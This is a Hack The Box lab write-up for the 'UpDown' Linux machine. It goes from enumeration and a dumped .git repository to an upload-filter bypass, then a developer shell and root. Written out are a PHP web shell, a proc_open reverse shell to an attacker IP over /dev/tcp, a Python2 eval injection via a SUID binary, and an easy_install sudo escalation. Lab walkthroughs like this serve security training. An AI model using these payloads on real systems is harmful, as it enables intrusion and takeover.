#hackthebox #medium #linux #tjnull
![[Pasted image 20250806165015.png]]
# Information Gathering - Nmap
I scanned all TCP ports and discovered 2 open ports: 22 and 80
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:39 UTC
Nmap scan report for 10.10.11.177
Host is up (0.061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 17.47 seconds
```
I performed one more TCP scan but only against port 22 and 80.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:43 UTC
Nmap scan report for 10.10.11.177
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds
```
Lastly, I scanned top 10 UDP ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-06 17:44 UTC
Nmap scan report for 10.10.11.177
Host is up (0.048s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp closed dhcps
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
161/udp closed snmp
445/udp open|filtered microsoft-ds
631/udp closed ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds
```
---
# Enumeration
##### HTTP - TCP 80
It's a page that tells you if a website is up and running or down.
![[Pasted image 20250806124741.png]]
Mapped `siteisup.htb` to the IP address in `/etc/hosts` file.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "http://10.10.11.177 siteisup.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
http://10.10.11.177 siteisup.htb
```
![[Pasted image 20250806125724.png]]
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.177 - - [06/Aug/2025 17:56:28] "GET / HTTP/1.1" 200 -
10.10.11.177 - - [06/Aug/2025 17:57:30] "GET / HTTP/1.1" 200 -
```
![[Pasted image 20250806125737.png]]
I turned `Deubg mode` on and checked again. It shows the HTTP header of the request and lists every file available in that directory.
![[Pasted image 20250806130326.png]]
Burp shows the same thing.
![[Pasted image 20250806130035.png]]
`ffuf` discovers 1 valid subdomain: `dev.siteisup.htb`. I'll also add that to `/etc/hosts` file.
![[Pasted image 20250806132151.png]]
However `dev.siteisup.htb` returns `Forbidden 403`
![[Pasted image 20250806143514.png]]
I manually found `.git` under `/dev` because my go-to wordlists do not contain `.git` in their search
![[Pasted image 20250806133907.png]]
`git-dumper` downloads all the source code to `git_loot` directory.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git-dumper http://siteisup.htb/dev/.git git_loot
[-] Testing http://siteisup.htb/dev/.git/HEAD [200]
[-] Testing http://siteisup.htb/dev/.git/ [200]
[-] Fetching .git recursively
...
<SNIP>
```
```bash
commit 010dcc30cc1e89344e2bdbd3064f61c772d89a34 (HEAD -> main, origin/main, origin/HEAD)
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 19:38:51 2021 +0200
Delete index.php
commit c8fcc4032487eaf637d41486eb150b7182ecd1f1
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 19:38:08 2021 +0200
Update checker.php
commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 18:33:11 2021 +0200
Create checker.php
commit ab9bc164b4103de3c12ac97152e6d63040d5c4c6
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 18:30:58 2021 +0200
Update changelog.txt
commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 18:30:39 2021 +0200
Create admin.php
commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 18:29:45 2021 +0200
Add admin panel.
commit 35a380176ff228067def9c2ecc52ccfe705de640
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 17:40:49 2021 +0200
Create changelog.txt
commit 4fb192727c29c158a659911aadcdcc23e4decec5
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 15:28:26 2021 +0200
Create stylesheet.css
commit 6f89af70fd23819664dd28d764f13efc02ecfd88
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 15:05:40 2021 +0200
Create index.php
commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 15:05:08 2021 +0200
Create .htpasswd
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <
[email protected]>
Date: Wed Oct 20 15:04:38 2021 +0200
Create .htaccess
```
Found this inside `.htaccess` file. I think it's telling me to add `Special-Dev: only4dev` in the request header.
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ cat .htaccess
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header
```
As I added `Special-Dev` header in the request, the server returned 200 OK.
![[Pasted image 20250806143716.png]]
In the Burp settings, I have added `Specia-Dev: only4dev` so every time I make a request through Burp, it will automatically add that in to the header.
![[Pasted image 20250806144606.png]]
After applying the new settings, I navigated to `dev.siteisup.htb` and it didn't return `Forbidden` but a new web page with a file upload feature. Also, on the top left, it says `This is only for developers` and it's currently in `beta` version.
![[Pasted image 20250806144812.png]]
I tried uploaidng `php-reverse-shell.php` file but it returned `Extension not allowed!`
![[Pasted image 20250806145251.png]]
I revisited the source code we dumped using `git-dumper` and `checker.php` is the file that checks upload feature conditions. We can see that it's blocking any file extensions that contain the word `php`.
![[Pasted image 20250806145718.png]]
It didn't error this time saying "Extension not allowed".
![[Pasted image 20250806150124.png]]
However, when I navigated into the newly created folder in `/uploads`, nothing was there.
![[Pasted image 20250806151623.png]]![[Pasted image 20250806151631.png]]
I suspect that's because of this code, which deletes all the uploaded files after checking.
![[Pasted image 20250806151721.png]]
I renamed my payload back to `shell.php`, compressed it as a zip file and named it `shell.zip`
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ mv shell.phar shell.php
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (deflated 59%)
```
As you can see the `.jpeg` file is not deleted.
![[Pasted image 20250806151947.png]]
However it fails to execute the webshell.
![[Pasted image 20250806152034.png]]
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php system($_GET["cmd"]); ?>
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (stored 0%)
```
I used a `php wrapper` technique to include my payload but it still failed. I'll attempt to look up `phpinfo` and see how the server is configured.
![[Pasted image 20250806152900.png]]
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php phpinfo() ?>
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (stored 0%)
```
`http://dev.siteisup.htb/?page=phar://uploads/889285754fc9d306daaa0e2e2f218169/shell.jpeg/shell` finally returned `phpinfo()` page.
![[Pasted image 20250806153413.png]]
It reveals that a lot of functions are disabled including `system` and `exec`
![[Pasted image 20250806153641.png]]
I am going to use `dfunc-bypasser.py` to discover what alternatives I can use to get command execution. It kept failing, then I remembered that I have to add `Special-dev` hearder.
![[Pasted image 20250806154956.png]]
`dfunc-bypasser` verifies we can use `proc_open` function.
![[Pasted image 20250806155235.png]]
Created a reverse shell using `proc_open` function.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php
$cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'";
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($cmd, $descriptorspec, $pipes);
?>
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.jpeg shell.php
adding: shell.php (deflated 37%)
```
Finally got a shell as `www-data`
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.177] 43444
bash: cannot set terminal process group (922): Inappropriate ioctl for device
bash: no job control in this shell
www-data@updown:/var/www/dev$ whoami
whoami
www-data
www-data@updown:/var/www/dev$
```
# Privilege Escalation - shell as `developer`
Found `user.txt` in `/home/developer` but cannot access it with the current user privileges.
```bash
www-data@updown:/home/developer$ ls -l
total 8
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 dev
-rw-r----- 1 root developer 33 Aug 6 17:36 user.txt
```
Inside `/home/developer/dev`, `siteisup` file has a SUID bit set. It appears to run `siteisup_test.py` file.
![[Pasted image 20250806163225.png]]
`siteisup_test.py` seems to be written in `Python2` which has a major vulnerability with `input()`, which takes input from the user and pass it to `eval()` meaning if we pass some command as input, it will run it.
```bash
www-data@updown:/home/developer/dev$ cat siteisup_test.py
import requests
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
print "Website is up"
else:
print "Website is down"www-data@updown:/home/developer/dev
```
Successfully got a shell as `developer`
```bash
www-data@updown:/home/developer/dev$ ls
siteisup siteisup_test.py
www-data@updown:/home/developer/dev$ ./siteisup
Welcome to 'siteisup.htb' application
Enter URL here:__import__('os').system('bash')
developer@updown:/home/developer/dev$ whoami
developer
```
# Privilege Escalation - shell as `root`
Even though I got a shell as `developer` I still could not access `user.txt` file
```bash
developer@updown:/home/developer$ id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
developer@updown:/home/developer$ cat user.txt
cat: user.txt: Permission denied
```
I copied the private key in `/home/developer/.ssh` and logged into SSH server with the key.
```bash
developer@updown:/home/developer/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
```
Got `user.txt`
```bash
developer@updown:~$ id
uid=1002(developer) gid=1002(developer) groups=1002(developer)
developer@updown:~$ cat user.txt
610...
```
User developer can run `/usr/local/bin/easy_install` command as `sudo` and no password required.
```bash
developer@updown:/home/developer/dev$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_install
```
I referred to `GTFObins` for `easy_install`exploit
```bash
developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$ sudo easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.PgqnvDp3QD
Writing /tmp/tmp.PgqnvDp3QD/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.PgqnvDp3QD/egg-dist-tmp-KvASUn
# whoami
root
```
Found `root.txt`
```bash
# cd /root
# cat root.txt
e643...
```